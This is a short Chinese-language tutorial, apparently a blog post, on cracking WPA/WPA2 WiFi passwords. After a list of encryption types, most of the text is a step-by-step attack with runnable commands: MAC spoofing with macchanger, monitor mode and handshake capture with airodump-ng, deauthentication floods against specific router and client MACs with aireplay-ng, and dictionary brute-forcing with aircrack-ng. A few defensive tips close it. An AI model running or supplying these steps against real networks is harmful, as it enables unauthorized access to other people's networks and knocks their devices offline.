无线加密方式:
1、WEP(有限等效加密)–采用WEP64位或者128位是数据加密 目前比较差
2、WPA-PSK{TKIP}–采用预共享的WIFI保护访问,采用WPA-PSK标准加密技术,加密类型TKIP
3、WPA2-PSK[AES]–采用预共享密钥的WIFI保护访问(版本2),采用WPA2-PSK标准加密技术,加密类型为AES
4、WPA-PSK[TKIP]+WPA-PSK【AES】–允许客户端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]
5、WAPI-即无线局域网鉴别与保护基础结构,中国支持的加密技术,是中国无线局域网强制性标准中的安全机制
全球无线局域网就两个美国的IE802.11 中国的WAPI,目前主流WPA2-PSK
第一步:桥接无线网卡
第二步:查看网卡信息
第三步:启动修改网卡混杂模式
root@localhost:~# airmon-ng stop wlan0 关闭无线网卡
root@localhost:~# macchanger –mac 00:11:22:33:44:55 wlan0 修改无线网卡MAC地址
root@kali:~# airmon-ng start wlan0 开启无线网卡
第四步:搜索无线信号 Ctrl+c 停止搜索
root@localhost:~#airodump-ng mon0 扫描无线信号
第五步:抓取握手信息
root@localhost:~#airodump-ng -c 8 -w maguangjie –bssid C8:3A:35:58:12:C8 mon0
-c 是信道 -w是保存数据包名称及路径 本次默认保存在/root bssid无线路由器mac地址
第六步:泛洪***无线
root@localhost:~#aireplay-ng -0 100 -a C8:3A:35:58:12:C8 -c 00:0f:10:00:a6:61 mon0
root@localhost:~# aireplay-ng –deaut 100000 -a E8:65:D4:5B:2F:30 -c 60:36:DD:A6:18:D2 mon0 –ignore-negative-one
第七步:握手信息(handshake 0 表示没抓到包)
第八步:上传密码字典
第九步:暴力破解
root@localhost:~# aircrack-ng -w /root/mi maguangjie-*.ca # -w 指定字典/root/mi的路径
第十步:得出密码
防御 WIFI破解的方法
1、.禁止SSID广播,隐藏无线路由器名称
2、绑定MAC地址
3、设置WPA2-PSK密码连接,尽量将密码设置复杂,延长***者破解密码的时间
4、移动设备不要“越狱”或ROOT,不要连接来路不明的无线网络
